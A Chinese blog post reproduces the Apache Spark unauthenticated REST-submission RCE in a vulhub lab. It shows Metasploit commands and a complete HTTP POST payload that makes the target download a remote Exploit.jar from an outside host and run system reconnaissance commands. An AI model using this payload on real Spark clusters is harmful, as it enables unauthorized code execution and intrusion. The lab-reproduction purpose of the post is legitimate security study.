Apache Spark 未授权访问漏洞复现

最新推荐文章于 2024-05-12 10:41:40 发布
最新推荐文章于 2024-05-12 10:41:40 发布
阅读量4.6k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: spark apache docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/119934910
版权

Apache Spark 未授权访问漏洞复现

介绍

Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。

环境搭建

kali :192.168.89.130

使用vulhub漏洞靶场搭建,进入目录下/spark/unacc ,运行 docker-compose up -d

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eH9ZTFDF-1629967136696)(https://i.loli.net/2021/08/26/9TMGmnrxboDafU1.png)]

然后重新输入运行环境

image-20210826141813923

漏洞复现

使用nmap扫描端口,8080/8081开放即可能存在漏洞

image-20210826143651263

访问8080端口即可打开master,版本是2.3.1

image-20210826141923146

使用msf进行攻击

search spark查看可利用的模块

image-20210826143924397

这里使用第一个

use exploit/linux/http/spark_unauth_rce

设置好payload

image-20210826144039368

options查看需要配置的信息

image-20210826144141814

set rhosts 192.168.89.130

set srvhost 192.168.89.130

set rport 6066

set srvport 8080

设置好后再次运行options检查一下是否配置正常,然后运行,run或者exploit

然后报错了。。。。这里没实现成功

另一个方法

利用StandaloneRestServer API提交应用,REST服务端的默认端口号是6066;

访问6066端口,这里是192.168.89.131:6066,抓包,然后修改发送

exp:

POST /v1/submissions/create HTTP/1.1
Host: 192.168.44.131:6066
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Drupal.toolbar.collapsed=0; has_js=1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 699

{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.3.1",
  "appArgs": [
    "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
  ],
  "appResource": "https://github.com/aRe00t/rce-over-spark/Exploit.jar",
  "environmentVariables": {
    "SPARK_ENV_LOADED": "1"
  },
  "mainClass": "Exploit",
  "sparkProperties": {
    "spark.jars": "https://github.com/aRe00t/rce-over-spark/Exploit.jar",
    "spark.driver.supervise": "false",
    "spark.app.name": "Exploit",
    "spark.eventLog.enabled": "true",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://192.168.44.131:6066"
  }
}

目标:Host: your-ip:6066
版本:“clientSparkVersion”: “2.3.1”
执行的命令: “appArgs”: [" "]

image-20210826155839062

上传成功

然后访问

https:// ip :8081/logPage/?driverId={submissionId}&logType=stdout

image-20210826160458224

这里submissionId就是burp中的值

image-20210826160335135

可以访问到日志页,这里是新开的服务器就没有记录了

image-20210826160712675

同样的方法,用在线的vulfocus测试一下

image-20210826161125110

访问8081端口后会有记录

image-20210826162740001
但是error了,暂时没找到原因。。。。尝试了一下午,有机会再试试吧。。。

yyyyzzzllll
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Apache Spark远程代码执行漏洞(CVE-2023-32007)漏洞复现
失心少年
08-24 1123
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。
ZooKeeper 授权访问漏洞处理方法
08-31
ZooKeeper 授权访问漏洞处理方法和重设setAcl,需要设置超级管理密码后,方可修改
漏洞复现Apache Spark 授权访问漏洞
做自己喜欢的事,并将其发挥到极致!
08-31 3960
Apache Spark 授权访问漏洞,详情请点击内容进入......
其他的 框架安全:Apache Shiro 授权访问漏洞.(CVE-2020-1957 || CVE-2020-11989)
最新发布
网络安全领域___专研者.
05-12 461
Apache Shiro 是一个强大且易用的Java安全框架,它为应用程序提供了身份验证、授权、加密和会话管理等常见的安全功能。漏洞大多会发生在登录处,返回包里包含remeberMe=deleteMe字段.(Shiro 这个属于第三方的,Apache 中的 Shiro)
Apache Spark授权访问漏洞排查
dayouzi的博客
08-14 874
Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。由于Apache Spark的认证机制存在缺陷,导致共享密钥认证失效。攻击者利用该漏洞,可在授权的情况下,远程发送精心构造的过程调用指令,启动Spark集群上的应用程序资源,获得目标服务器的权限,实现远程代码执行。相关链接。
Apache Spark 授权访问漏洞
weixin_44508748的博客
12-14 3565
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点启动ACL(访问控制),我们将可以在集群中执行任意代码。 本次复现使用docker+vulhub一键搭建: docker-compose up -d 环境启动后,会自动启用四个端口:8080,8081,6066,7077 他们分别为: master的管理页面:http://your-ip:8080 slave的管理页面:http://your-ip:8081 standalone模式下,maste
Apache Spark 任意代码执行漏洞(CVE-2020-9480)
weixin_44047654的博客
03-28 1217
Apache Spark 任意代码执行漏洞(CVE-2020-9480)
威胁快报| 首个Spark REST API授权漏洞利用分析
weixin_33953384的博客
07-27 353
2018年7月7日,阿里云安全首次捕获Spark REST API的授权RCE漏洞进行攻击的真实样本。7月9号起,阿里云平台已能默认防御此漏洞的大规模利用。 这是首次在真实攻击中发现使用“暗网”来传播恶意后门的样本,预计来这一趋势会逐步扩大。目前全网约5000台 Spark服务器受此漏洞影响。阿里云安全监控到该类型的攻击还处于小范围尝试阶段,需要谨防...
授权访问漏洞总结
热门推荐
七月_的博客
08-20 2万+
Web端 http://219.141.242.77:7777/pe-admin/ #后台授权访问 http://219.141.242.77:7777/pe-admin/main.jsp 参考:华泰保险某系统漏洞打包(授权访问\弱口令\Getshell) 服务端 授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被...
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 ...
Apache Flink 授权访问+远程代码执行.pdf
04-30
Apache Flink 授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
【高危】Apache Spark 权限提升漏洞(CVE-2023-22946)
murphysec的博客
04-18 1591
Apache Spark 是一款支持非循环数据流和内存计算的大规模数据处理引擎。 使用 spark-submit 脚本在集群中启动任务可以通过指定proxy-user参数限制运行用户。在 Apache Spark 受影响版本中,攻击者通过指定自定义的classpath,则可以覆盖该配置,进而绕过权限限制。 一些依赖proxy-user实现控制的系统(如Apache Livy)、云服务可能会受该漏洞影响,普通用户可以在classpath可控的情况下绕过spark的用户权限限制,执行原本没有权限的操作。
[ 漏洞复现篇 ] Apache Spark 命令注入(CVE-2022-33891)
qq_51577576的博客
08-16 1927
Apache Spark 命令注入(CVE-2022-33891) 👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!...
CVE-2022-33891:Apache Spark 命令注入漏洞通告
weixin_68057794的博客
08-08 1294
它还支持一组丰富的高级工具,包括用于 SQL 和 DataFrames 的 Spark SQL、用于 Pandas 工作负载的 Spark 上的 Pandas API、用于机器学习的 MLlib、用于图形处理的 GraphX 和用于流处理的结构化流。在进入doFilter函数之后,首先会提取参数“doAs”的值,然后赋值给effectiveUser,进入org.apache.spark.SecurityManager#checkUIViewPermissions函数。...
CVE-2022-33891 Apache Spark shell 命令注入漏洞分析
shelter1234567的博客
03-26 950
Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。Spark是UC Berkeley AMP lab (加州大学伯克利分校的AMP实验室)所开源的类Hadoop MapReduce的通用并行框架 Spark,拥有Hadoop MapReduce所具有的优点;但不同于MapReduce的是——Job中间输出结果可以保存在内存中,从而不再需要读写HDFS,因此Spark能更好地适用于数据挖掘与机器学习等需要迭代的MapReduce的算法。
CVE-2020-9480: Apache Spark 远程代码执行漏洞通告
爱国小白帽
06-26 3024
CVE-2020-9480: Apache Spark 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 前天 0x00 漏洞背景 2020年06月24日, 360CERT监测发现 Apache Spark 官方 发布了 Apache Spark 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-9480,漏洞等级:高危。 Apache Spark是一个开源集群运算框架,专为大规模数据处理而设计的快速通用的计算引擎,Spark是UC Berk
ApacheSpark-命令执行(CVE-2022-33891) 漏洞复现
告白的博客
07-21 2286
Apache Spark存在一处命令注入,该漏洞是由于Apache Spark UI提供了通过配置选项spark.acls.enable启用ACL的可能性,HttpSecurityFilter中的代码路径可以通过提供任意用户名来允许某人执行模拟。恶意用户凭借访问权限检查函数最终将基于其输入构建Unix shell命令并执行它。成功利用此漏洞可导致任意shell命令执行。...
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值